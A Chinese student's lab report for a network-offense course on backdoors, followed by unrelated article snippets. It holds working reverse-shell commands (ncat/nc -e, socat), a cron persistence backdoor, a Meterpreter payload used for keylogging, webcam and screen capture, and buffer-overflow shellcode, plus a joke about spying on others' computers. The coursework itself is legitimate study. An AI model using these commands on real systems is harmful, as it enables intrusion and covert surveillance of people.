2019-2020-220175303柴轩达《网络对抗技术》exp2后门原理与实践(代码片段)

cxd20175303 cxd20175303     2023-04-11     633

关键词:

2019-2020-2 20175303柴轩达 《网络对抗技术》Exp2 后门原理与实践

1.基础知识总结

(1)后门:是不经过正常认证流程而访问系统流程的通道。

(2)常见后门有:编译器后门、操作系统后门、应用程序后门、潜伏或伪装成特定应用的专用后门程序。

(3)布置后门的流程:<1>有一个后门程序;<2>将其放置在系统里;<3>使后门程序代码运行起来;<3>不被查杀软件查杀且不被防火墙发现。(常用技术有:反弹式连接;加密技术;隧道技术)。

(4)常用后门工具:
netcat:又名nc、ncat。是一个底层工具,进行基本的TCP.UDP数据收发,常与其他工具结合使用作为后门。

Linux:自带netcat,输入man nc查看其使用说明。

Windows: 下载ncat.rar工具包到桌面。

meterpreter:是一个后门平台。其中有大量零件可调参数,用时组合可以生成可执行文件。

(5)后门启动:

任务计划程序——>新建任务计划——>触发器——>操作程序或脚本——>操作添加参数。

2.实验内容

任务一

(1)Linux获得Win Shell
输入ifconfig查看到kali的IP地址为192.168.0.10
技术图片

输入nc -l -p 5303在Linux运行监听
技术图片

windows在命令窗口进入桌面
技术图片

在ncat文件目录下输入ncat.exe -e cmd.exe 192.168.0.10 5303,使Windows反弹连接Linux
技术图片

Linux下看到Windows的命令提示,可运行指令
技术图片

(2)Win获得Linux Shell:
首先在Windows命令窗口中使用ipconfig查看主机IP地址 192.168.3.27
技术图片

windows在ncat.exe文件目录下输入ncat.exe -l -p 5303打开windows 监听
技术图片

Linux反弹连接windows:nc 192.168.3.27 5303 -e /bin/sh
技术图片

windows下获得一个linux shell,可运行指令
技术图片

(3)使用netcat获取主机操作Shell,cron启动

Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。
crontab指令增加一条定时任务,"-e"表示编辑。

在kali端输入crontab -e
选择第二个编辑器
技术图片

并添加下面这行代码后保存退出,表示在每个小时的第3分钟执行后面的那条指令。
3 * * * * /bin/netcat 192.168.3.27 5303 -e /bin/sh
技术图片

可以通过"crontab -l"来查看,"-l"表示list
下图为执行代码后的结果
技术图片

任务二

使用socat获取主机操作Shell, 任务计划启动

socat,即Netcat++,是超级netcat工具。

右击计算机—>点击计算机管理
技术图片

点击任务计划程序—>点击创建任务
技术图片

设置任务名
技术图片

新建触发器
技术图片

新建操作,在程序或脚本中选择socat.exe文件的路径,添加参数中填写tcp-listen:5303 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5303,同时把cmd.exe的stderr重定向到stdout上,然后确定
技术图片

当时间到时,此时可以看到任务的状态为正在运行,同时会弹出一个cmd窗口。
技术图片

在kali中输入指令socat - tcp:192.168.3.27:5303,成功获得了一个shell
技术图片

任务三

使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=5303 -f exe > 20175303_backdoor.exe命令生成生成20175303_backdoor.exe文件
其中LHOST是本地即Kali的IP
-f 生成文件的类型

输出到哪个文件
技术图片

在Windows下执行ncat.exe -lv 5303 > 20175303_backdoor.exe,使被控主机进入接收文件模式
技术图片

在kali中执行nc 192.168.3.27 5303 < 20175303_backdoor.exe
技术图片

出现下图表明文件传输成功
技术图片

MSF打开监听进程
输入msfconsole进入msf控制台
输入use exploit/multi/handler设置payload
输入set payload windows/meterpreter/reverse_tcp使用和生成后门程序时相同的payload
输入set LHOST 192.168.0.10,设置本地ip
输入set LPORT 5303设置本地端口
输入show options查看选项
输入exploit开始监听
技术图片

在windows后门文件夹中运行后门程序
技术图片

在kali端获取Windows的shell,可以输入dir来验证
技术图片

任务四

使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
使用record_mic指令获取目标机截获一段音频(未成功)
技术图片

使用webcam_snap指令获取目标机摄像头
技术图片

使用keyscan_startkeyscan_dump指令获取目标机击键记录
技术图片

使用screenshot指令获取目标机截图
技术图片

使用getuid指令查看当前用户,使用getsystem指令进行提权操作(未成功)
技术图片

参考同学博客试图修复getsystem功能后,仍未成功
使用background命令之后会自动退出到msf的命令行下,得到session x,此处为session 1
在msf命令行下输入search bypassuac
再输入use exploit/windows/local/bypassuac
然后再输入set session 填写内容为你使用background查看到的session数值)
最后输入run(输入run后运行结果不正确)
技术图片

当运行结果大致为图文所示内容时才对
技术图片

任务五

可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
exploit database官网的shellcode找一个linux/x86平台的,用于反弹连接的shellcode下载下来。
技术图片

打开下载下来的文件夹,复制这块地址
技术图片

参考实验一的任务三
通过输入execstack -s pwn1设置堆栈可执行
输入execstack -q pwn1查询文件的堆栈是否可执行,显示X pwn1则表示可执行
输入echo "0" > /proc/sys/kernel/randomize_va_space关闭地址随机化
输入more /proc/sys/kernel/randomize_va_space查看随机化是否关闭,如显示0则已关闭,2未关闭
输入perl -e ‘print "A" x 32;print"x04x03x02x01x31xc0x31xdbx31xc9x31xd2x66xb8x67x01xb3x02xb1x01xcdx80x89xc3xb8x80xffxffxfex83xf0xffx50x66x68x11x5cx66x6ax02x89xe1xb2x10x31xc0x66xb8x6ax01xcdx80x85xc0x75x24x31xc9xb1x02x31xc0xb0x3fxcdx80x49x79xf9x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9x31xd2xb0x0bxcdx80xb3x01x31xc0xb0x01xcdx80"‘ > input_shellcode来将复制并加上0x01020304后得到的地址输入到input_shellcode里
在第一个终端中输入(cat input_shellcode;cat) | ./pwn1运行pwn1
在第二个终端中输入ps -ef | grep pwn1查看pwn1的进程号
查看pwn1的进程号为多少
输入gdb调试
…(具体请参考实验一博客
最后找到栈顶(esp)中存放的地址为0xffffd20c
技术图片

计算出shellcode地址就是0xffffd20c+4,即0xffffd210。
输入perl -e ‘print "A" x 32;print"x10xd2xffxffx31xc0x31xdbx31xc9x31xd2x66xb8x67x01xb3x02xb1x01xcdx80x89xc3xb8x80xffxffxfex83xf0xffx50x66x68x11x5cx66x6ax02x89xe1xb2x10x31xc0x66xb8x6ax01xcdx80x85xc0x75x24x31xc9xb1x02x31xc0xb0x3fxcdx80x49x79xf9x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9x31xd2xb0x0bxcdx80xb3x01x31xc0xb0x01xcdx80"‘ > input_shellcode
输入(cat input_shellcode;cat) | ./pwn1运行pwn1
技术图片

在另一台终端中输入msfconsole打开msf控制台
输入use exploit/multi/handler设置payload
输入set payload linux/x86/shell_reverse_tcp使用和生成后门程序时相同的payload
输入set LHOST 192.168.0.10,设置本地ip
输入set LPORT 4444设置端口
输入show options查看选项
输入exploit开始监听后可以输入命令
技术图片

3.问题与解决

问题1:在任务三windows运行后门程序时未运行成功
解决:原因是防火墙、实时防护等未关彻底,把实时防护、电脑管家设置里面的安全防护、防火墙都关掉才能正常实验
问题2:在任务四截取一段音频时未成功
解决:未解在网上搜没找到合适的解决办法,把有关声音的一切设置都打开了,并没有起到什么作用
问题3:在任务四getsystem提权时未成功
解决:未解决,参考其他同学的博客有相关解决方法,但并未奏效

4.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?
随意的下载不是官方网站,大公司的软件或资料;硬盘磁盘U盘携带

(2)例举你知道的后门如何启动起来(win及linux)的方式?
1.被攻击者点击;
2.定时启动;
3.开机自启动;
4.缓冲区溢出攻击

(3)Meterpreter有哪些给你映像深刻的功能?
截取音频、启动摄像头、截屏、提权

(4)如何发现自己有系统有没有被安装后门?
答:查看注册表、进程、端口情况,使用杀毒软件。

5.实验总结与体会

答:通过本次实验,对后门注入攻击的基本原理有了初步的了解。其实实验本身不难,跟着老师视频学习,有了思路之后,先自己做,实在不会了参考一下别人博客绝大部分能做出来。做实验的时候总想操作一下别人的电脑,以后就可以监控他了哈哈。另外,通过这次实验真实的感受到自己有可能被攻击被监视,做实验关闭防火墙,关闭实时防护后,电脑还是会检测是否有不安全因素存在,有危险就发出警告,发现除了做实验用的后门被检测出来外,还有另外一个不知道是什么东西多警告,有点害怕,以后能保护好还是尽量保护好。

2018-2019-220175303实验三敏捷开发与xp实践《java开发环境的熟悉》实验报告(代码片段)

2018-2019-220175303实验三敏捷开发与XP实践《Java开发环境的熟悉》实验报告实验报告封面课程:Java程序设计班级:1753姓名:柴轩达学号:20175303指导教师:娄嘉鹏实验日期:2019年4月29日-5月2日实验序号:3实验名称:敏捷开发与XP实... 查看详情

网络分流器-网络分流器tap网络流量监控

戎腾网络分流器作为网络安全重要装备,是整个网络安全领域网络监控前端最关键的装备!今天我们详解网络流量监控!网络分流器TAPATCA网络分流器支持多用户高密度网络分流器DPI检测五元组过滤网络分流器镜像可视化流量汇聚分... 查看详情

网络拓扑管理

一、网络拓扑是什么网络拓扑是指传输介质互联各种设备的物理布局。是构成网络成员间特定的物理或者逻辑的排列方式。二、网络拓扑的发展早期因网络结构比较简单,设备类型比较单一,网络的管理也相对容易,简单来说网... 查看详情

云原生之dockerdocker的网络管理

【云原生之Docker】Docker的网络管理一、bridge网络1.bridge网络介绍2.bridge网络使用场景3.查看bridge网络详细信息4.运行bridge网络的容器5.查看容器网络二、host网络1.host网络介绍2.host网络使用场景3.host网络详细信息4.运行host网络容器5.... 查看详情

网络技术基础网络互连技术

零.简介1.网络互连的核?是网络之间的硬件连接和网间互连协议,掌握网络互连的基本知识是进?步深?学习网络应?技术的前提。 一.简介1.网络互连的含义:网络互连是指将分布在不同地理位置、使?不同数据链路层协议的单个... 查看详情

网络分流器-网络分流器-网络安全评估探讨

有关注笔者文章的朋友肯定知道,戎腾网络分流器作为网络安全领域前端网络监控的重要基础设备!今天得空聊一聊,网络安全问题!也算是一种拓展吧|网络分流器网络分流器1引言|网络分流器|网络安全随着互联网的普及、电子商务... 查看详情

人工智能ai3:全连接网络,前馈神经网络卷积神经网络:非全连接网络cnn:循环神经网络

目录全连接网络,前馈神经网络卷积神经网络:非全连接网络CNN:循环神经网络 查看详情

人工智能ai3:全连接网络,前馈神经网络卷积神经网络:非全连接网络cnn:循环神经网络

目录全连接网络,前馈神经网络卷积神经网络:非全连接网络CNN:循环神经网络 查看详情

十网络分析系统

简介网络分析系统是一个让网络管理者,能够在各种网络问题中,对症下药的网络管理方案,它对网络中所有传输的数据进行检测、分析、诊断,帮助用户排除网络事故,规避安全风险,提高网络性能,增大网络可用性价值。&nb... 查看详情

网络对抗技术-网络侦查与网络扫描

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名赵致远年级 2014级区队 2区指导教师 高见  信息技术与网络安全学院2017年7月7... 查看详情

网络对抗技术-网络侦查与网络扫描

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名翟一鸣 年级 2014级区队 2区指导教师 高见  信息技术与网络安全学院2017... 查看详情

网络对抗技术-网络侦查与网络扫描

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名石琳 年级 2014级区队 2区指导教师 高见  信息技术与网络安全学院2017年7... 查看详情

网络对抗技术-网络侦查与网络扫描

...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描   学生姓名袁昊晨 年级 2014级区队 2区指导教师 高见  信息技术与网络安全学院2017... 查看详情

神经网络残差网络

前言我们都知道增加网络的宽度和深度可以很好的提高网络的性能,深的网络一般都比浅的的网络效果好,比如说一个深的网络A和一个浅的网络B,那A的性能至少都能跟B一样,为什么呢?因为就算我们把A的网络参数全部迁移到B... 查看详情

网络网络发展,网络协议,网络传输流程,地址管理

1.计算机网络背景1.1网络发展计算机体系结构本质也可以被看做是一个小型网络。计算机与计算机之间也是用“线”连接起来的。与其说两台计算机通信,本质上其实也是通过“线”链接起来。不过是“线”长了一点(网线,无... 查看详情

win10为啥不能修改网络位置,一直都是公用网络,怎么修改?

win10修改网络位置方法:1、点击右下角网络图标,选择网络设置。2、选择管理已知网络。3、选择需要修改的网络连接名,点击属性。4、将“将这台电脑设为可被检测到”的开关打开即可。参考技术A点一下你第二张图里的本地... 查看详情

从配置的网络中删除网络并启用所有其他网络

】从配置的网络中删除网络并启用所有其他网络【英文标题】:Removenetworkfromconfigurednetworksandenableallothernetworks【发布时间】:2017-05-0802:15:02【问题描述】:我正在androidstudio中制作一个使用wifimanager连接到特定wifi网络的应用程序... 查看详情

网络架构设计之学习路线

3.1 网络架构设计网络架构设计是在云上进行业务技术架构设计的第一步,本节将结合阿里云基础网络产品介绍如何进行网络架构设计、规划和建设。3.1.1 网络产品简介进行网络架构设计时离不开网络产品的应用,所以我们先... 查看详情